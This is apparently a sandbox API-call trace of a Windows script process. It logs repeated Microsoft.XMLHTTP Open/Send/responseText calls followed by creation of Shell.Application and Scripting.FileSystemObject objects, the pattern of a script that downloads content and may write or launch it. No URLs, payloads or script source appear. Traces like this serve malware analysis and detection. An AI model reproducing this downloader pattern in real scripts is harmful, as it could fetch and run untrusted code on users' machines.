	[0486.691] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0486.691] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0486.691] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0486.691] longjmp () 
	[0486.691] longjmp () 
	[0486.691] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0486.691] SysStringLen (param_1=0x0) returned 0x0
	[0486.691] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0486.692] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0486.692] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0486.692] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0486.692] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0486.692] ??2@YAPEAX_K@Z () returned 0x62f330
	[0486.692] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0486.692] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0486.692] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0486.692] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0486.692] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0486.692] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0486.692] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0486.692] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0486.693] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0486.693] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0486.693] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0488.537] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0488.537] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0488.537] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0488.537] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0488.538] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0488.538] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0488.538] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0488.538] SysStringLen (param_1=0x0) returned 0x0
	[0488.538] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0488.538] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0488.538] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0488.538] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0488.538] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0488.538] ??2@YAPEAX_K@Z () returned 0x62f350
	[0488.539] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0488.539] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0488.539] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0488.539] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0488.539] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0488.539] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0488.539] SysStringLen (param_1=0x0) returned 0x0
	[0488.539] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0488.542] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0488.542] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0488.542] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0488.542] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0488.542] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0488.543] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0492.076] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0492.077] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0492.077] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0492.078] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0492.078] SysStringLen (param_1=0x0) returned 0x0
	[0492.078] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0492.078] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0492.078] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0492.079] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0492.079] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bc8) returned 0x0
	[0492.079] ??2@YAPEAX_K@Z () returned 0x62f330
	[0492.079] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bc8, pUnkSite=0x62f330) 
	[0492.079] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0492.079] XMLHTTPRequest:IUnknown:Release (This=0x49c5bc8) returned 0x0
	[0492.079] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0492.079] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0492.079] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0492.079] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0492.082] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0492.082] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0492.082] SysStringLen (param_1=0x0) returned 0x0
	[0492.082] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0492.082] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0492.082] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0492.082] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0492.082] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7558) returned 0x0
	[0492.082] ??2@YAPEAX_K@Z () returned 0x62f310
	[0492.082] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7558, pUnkSite=0x62f310) 
	[0492.082] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0492.082] XMLHTTPRequest:IUnknown:Release (This=0x49c7558) returned 0x0
	[0492.083] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0492.083] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0492.083] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0492.083] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0492.083] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0492.083] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0492.083] SysStringLen (param_1=0x0) returned 0x0
	[0492.083] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0492.083] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0492.083] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bc0) returned 0x0
	[0492.083] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0492.083] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0492.084] ??2@YAPEAX_K@Z () returned 0x62f330
	[0492.084] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0492.084] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0492.084] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0492.084] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bc0) returned 0x0
	[0492.084] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bc0) returned 0x3
